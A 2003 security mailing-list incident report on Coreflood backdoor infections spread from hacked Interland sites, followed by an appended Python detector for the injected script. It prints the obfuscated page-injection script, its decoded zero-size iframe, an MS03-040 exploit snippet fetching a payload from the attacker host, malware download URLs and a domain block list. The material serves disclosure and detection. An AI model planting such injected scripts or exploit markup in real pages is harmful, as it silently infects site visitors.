Security Incidents mailing list archives
RE: New Trojan
From: "James C. Slora, Jr." <james.slora () phra com>
Date: Thu, 30 Oct 2003 16:19:09 -0500
Rejected by the moderator last time I tried to post on this topic.

New backdoor.coreflood infections today from the same name string. This time ftp.goling2003.com at IP 66.98.178.33, wvw.goling2003.com at 216.40.230.17 and vvv.goling2003.com at 216.40.230.17. wvw.goling2003.com was again the source of the infection.

Downloads:
http://vvv.goling2003.com:53/stop.bat
http://vvv.goling2003.com:53/inf.ooo
ftp.goling2003.com/ap216.exe (different type of log - URL may be incomplete)

I DO think that the "goling" and "chinesenaming" strings are persistently relevant, and are not mere one-time distractions.

Block
*.goling.com
*.goling2003.com
*.chinesenaming.com

Not a comprehensive list, but these are the ones I have seen repeatedly.

IP addresses are irrelevant for blocking purposes. They have changed several times. There have been at least three mass compromises of Interland sites, and all three times the Coreflood author has redirected to sites with these types of names. The code changes, the exploit changes, and the IP addresses change - but he loves his aliases. They seem to be preferred signature strings of the author. Failing to find these strings in logs does not mean you are safe, but finding them gives you a reason to worry.

Yet again today, a compromised Interland site redirected to the malware site.
It appended the following script to the end of each page on the compromised site:

<script type="text/javascript">
document.write("\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0076\u0077\u002e\u0067\u006f\u006c\u0069\u006e\u0067\u0032\u0030\u0030\u0033\u002e\u0063\u006f\u006d\u002f\u006d\u0061\u0069\u006e\u002e\u0068\u0074\u006d\u006c\u0020\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0030\u0020\u0066\u0072\u0061\u006d\u0065\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0030\u0020\u006d\u0061\u0072\u0067\u0069\u006e\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020\u006d\u0061\u0072\u0067\u0069\u006e\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0030\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e");
</script>

IE is bright enough to run the script even though it comes after the </HTML> tag.

The Unicode string is just ASCII expressed as Unicode. It converts to hex:

%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%76%77%2e%67%6f%6c%69%6e%67%32%30%30%33%2e%63%6f%6d%2f%6d%61%69%6e%2e%68%74%6d%6c%20%20%77%69%64%74%68%3d%30%20%68%65%69%67%68%74%3d%30%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%20%6d%61%72%67%69%6e%77%69%64%74%68%3d%30%20%6d%61%72%67%69%6e%68%65%69%67%68%74%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e

Which converts to:

<iframe src=http://wvw.goling2003.com/main.html width=0 height=0 frameborder=0 marginwidth=0 marginheight=0></iframe>

Just your basic iframe, invoked by a script. But that page does use an exploit fixed in MS03-040 to force installation of arbitrary code:

<span datasrc="#oa" datafld="ea" dataformatas="html"> </span>
<xml id="oa">
<se>
<ea>
<![CDATA[
<object data="http://vvv.goling2003.com:53/inf.ooo" width=0 height=0> </object>
]]>
</ea>
</se>
</xml>
-----Original Message-----
From: James C. Slora, Jr.
Sent: Monday, October 27, 2003 4:32 PM
To: 'incidents () securityfocus com'
Subject: RE: New Trojan

John Tran wrote:

> Was this trojan discussed in Microsoft Security Bulletins? If so, what number or KB?

Coreflood variants have been installed by visiting compromised Web sites using exploits fixed in MS03-040 and MS03-032. I'm sure there are many other vectors of infection. Visits to sites whose names contain the strings "chinesenaming" or "goling" are particularly suspect as sources of infection. These strings (and maybe others too) were used in redirects from hacked Interland sites in September and October. 216.247.117.225 was the most recent IP address I've seen associated with the hostile sites.
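As an added example (not from the post or the list), a small Python detector for the kind of appended, \u-escaped document.write injection the post describes: it decodes the \uXXXX, \xXX and %XX forms, extracts any iframe the script writes, and flags zero-size frames whose host contains the name strings the post lists. The sample page is constructed here by re-encoding the post's decoded iframe; WATCH_STRINGS is taken from the post.

```python
import re
from urllib.parse import urlparse

# Name strings the post reports as recurring in the Coreflood redirect sites.
WATCH_STRINGS = ("goling", "chinesenaming")

# A document.write() whose single argument is a quoted string literal.
JS_WRITE_LITERAL = re.compile(r'document\.write\(\s*(["\'])(.*?)\1\s*\)', re.S)
# \uXXXX, \xXX and %XX: encodings of the same ASCII the post walks through.
ESCAPE = re.compile(r'\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})|%([0-9a-fA-F]{2})')
IFRAME = re.compile(r'<iframe\b([^>]*)>', re.I)
ATTR = re.compile(r'(\w+)\s*=\s*("[^"]*"|\'[^\']*\'|[^\s>]+)')


def decode_js_escapes(s):
    """Turn \\uXXXX, \\xXX and %XX escapes back into the characters they hide."""
    return ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2) or m.group(3), 16)), s)


def script_after_html_close(page):
    """True when a <script> follows </html>, as on the pages the post describes."""
    low = page.lower()
    end = low.rfind("</html>")
    return end != -1 and "<script" in low[end:]


def find_written_iframes(page):
    """Decode every document.write() literal; return (src, zero_size, watch_hit)
    for each iframe it writes."""
    findings = []
    for m in JS_WRITE_LITERAL.finditer(page):
        for tag in IFRAME.finditer(decode_js_escapes(m.group(2))):
            attrs = {k.lower(): v.strip("\"'") for k, v in ATTR.findall(tag.group(1))}
            src = attrs.get("src", "")
            zero_size = attrs.get("width") == "0" or attrs.get("height") == "0"
            host = (urlparse(src).hostname or "").lower()
            watch_hit = any(s in host for s in WATCH_STRINGS)
            findings.append((src, zero_size, watch_hit))
    return findings


# Constructed sample (not a captured page): the post's decoded iframe, re-encoded
# as \uXXXX and appended after </HTML> the way the compromised pages were modified.
INJECTED_IFRAME = ("<iframe src=http://wvw.goling2003.com/main.html width=0 height=0 "
                   "frameborder=0 marginwidth=0 marginheight=0></iframe>")
SAMPLE_PAGE = ("<html><body>legitimate content</body></HTML>\n"
               '<script type="text/javascript">\ndocument.write("'
               + "".join("\\u%04x" % ord(c) for c in INJECTED_IFRAME)
               + '");\n</script>')

if __name__ == "__main__":
    print("script after </html>:", script_after_html_close(SAMPLE_PAGE))
    for src, zero_size, hit in find_written_iframes(SAMPLE_PAGE):
        print(f"iframe src={src} zero_size={zero_size} watch_hit={hit}")
```

Run against saved copies of pages from a suspect host; a zero-size iframe written from an escaped literal after </html> is the pattern to alert on, whether or not the host matches the watch list.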